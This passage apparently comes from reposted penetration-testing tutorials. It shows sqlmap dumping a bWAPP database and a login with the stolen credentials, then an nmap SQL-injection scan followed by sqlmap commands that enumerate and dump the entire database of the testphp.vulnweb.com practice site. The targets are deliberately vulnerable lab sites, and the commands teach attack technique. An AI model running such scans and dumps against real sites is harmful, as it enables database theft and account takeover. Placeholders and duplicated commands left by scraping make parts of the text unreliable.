![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-j2nvu-IpDLE/WIYv1l88QaI/AAAAAAAAPBI/xclB_qpxb8kue6EpnvNCZZdDo0h0PaEpwCLcB/s1600/8.png?w=687&ssl=1)
Here I found only three entries for table “USERS” inside the bwapp which also contains credential for the admin account.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-x-hRUCiJlTE/WIYv2N55ELI/AAAAAAAAPBM/IW7Zen1rUcoDjxp8eCcuy5CLmM7crrXpwCLcB/s1600/9.png?w=687&ssl=1)
Another empty table “VISITORS” like “blog” table, it is also left blank.
Sqlmap has dumped too much of data from inside the database of bwapp, as you have seen I have got data from a different table, now let’s verify this result. Browse bwapp in localhost again and once again open the login form page inside the bwapp.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-k8WHXAgfLZc/WIYvz1G6j4I/AAAAAAAAPAg/sWRh-0CYG3oIohGK52XEfBSVqn0sQB4-wCLcB/s1600/10.png?w=687&ssl=1)
If you remembered sqlmap has dumped table of “HEROES” which contains login and password now using above fetched data (Thor: Asgard) from inside the table of “heroes” I will use these credential for login.
Now type thor in the text field given for login and then type Asgard as a password. Click on login.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-ckSvmc7YeeY/WIYvzyHlPpI/AAAAAAAAPAc/kjNmoObo6JotwRFwCDKEOGeqvqSaR1GMACLcB/s1600/15.png?w=687&ssl=1)
Congrats!!! We got successful login and you can read the secret given for Thor which exactly same as inside the “heroes” table.
Conclusion: Through this article, we had learned how to perform an attack on a login form of a web site and retrieve its data from inside the database.
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-qkjJx9xyJZU/WIYv0c057qI/AAAAAAAAPAo/zSvnFCvTCCIu952IhAK55oIVkShkynKqACLcB/s1600/16.png?w=687&ssl=1)
This article is about how to scan any target for SQL injection using NMAP and then exploit the target with sqlmap if NMAP finds the target is vulnerable to SQL injection. Now go with this tutorial for more details.
Firstly Type
[To see content please register here]
in URL to browse acunetix web application. Then Click the link given for the URL of Acuart as shown in the screenshot.![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-2g3WMuhQfLk/WH4SDrtE1GI/AAAAAAAAO-M/Zarcr81gink2ccychDskbUZqOMmLeoJBgCLcB/s1600/1.png?w=687&ssl=1)
Here the required web page will get opened; testphp.vulnweb.com is our targeted host and now scans this target using nmap to identifying the possibilities of SQL injection.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-Nmi-bPsidnM/WH4SDUV1QuI/AAAAAAAAO-I/SVZBh3OQHU04W0MCuj3gBu7qo25ZXy1dACLcB/s1600/2.png?w=687&ssl=1)
NMAP has NSE Script for http SQL injection vulnerabilities and scans the web application for SQL injection.
Spiders an HTTP server looking for URLs containing queries vulnerable to an SQL injection attack. It also extracts forms from found websites and tries to identify fields that are vulnerable.
The script spiders an HTTP server looking for URLs containing queries. It then proceeds to combine crafted SQL commands with susceptible URLs in order to obtain errors. The errors are analyzed to see if the URL is vulnerable to attack. This uses the most basic form of SQL injection but anything more complicated is better suited to a standalone tool.
We may not have access to the target web server’s true hostname, which can prevent access to virtually hosted sites.
Now type the following command to scan the target for SQL injection possibilities.
nmap -sV --script=http-sql-injection
[To see content please register here]
–p 801
nmap -sV --script=http-sql-injection
[To see content please register here]
–p 80From the screenshot, you can perceive that it has dumped the possible SQL injection for queries. Now let’s explore this query in the browser.
Note: please remove http:// from resultant queries while browsing.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-pSgKANBMa_c/WH4SDrw37HI/AAAAAAAAO-Q/jJjfIfmw-58lhLlLhBCnil4KcFKwKGOLgCLcB/s1600/3.png?w=687&ssl=1)
This page contains some message or warning related to some kind of error in the database query. Now let’s try to apply SQL injection using above resultant sqli query of NMAP inside sqlmap and try to figure out whether the result from nmap is correct for SQL injection vulnerability or not.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-TQtDX9F_tS0/WH4SEM1CJgI/AAAAAAAAO-U/CJl7ykopIbcf7Z23A-4FTe7ohs2kx4wBQCLcB/s1600/4.png?w=687&ssl=1)
Open the terminal in Kali Linux and type the following command for sqlmap
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query%27%200R%20sqlspider" --dbs --batch
1
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query%27%200R%20sqlspider" --dbs --batch
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-ypKIVMV1VOw/WH4SEPpLMXI/AAAAAAAAO-c/MpU_lS6fucYqs97U_a_V32s-C63ySJKBQCLcB/s1600/5.png?w=687&ssl=1)
We have got database name from the above resultant sqli query of NMAP inside sqlmap. You can read the database name acuart from the given screenshot.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-hq3_HDdU3A0/WH4SEDHbidI/AAAAAAAAO-Y/G10iG1HV9vEULgGc3rAANDc1YckEs6yuACLcB/s1600/6.png?w=687&ssl=1)
Now try to find out entire data under this URL by typing following command.
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query%27%200R%20sqlspider" -D acuart --dump-all
1
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query%27%200R%20sqlspider" -D acuart --dump-all
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-q7HQp7uGDs4/WH4SEg6vYhI/AAAAAAAAO-g/V7OzExlXi3crSWbCicdDseCU9OerFhUdgCLcB/s1600/7.png?w=687&ssl=1)
This will dump all available information inside the database. Now try it by yourself.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-JVVdmGILxv8/WH4SEwTX7-I/AAAAAAAAO-k/ZANj_YYVyGQQYQE_AG-cwoA2JDhi6F8GgCLcB/s1600/8.png?w=687&ssl=1)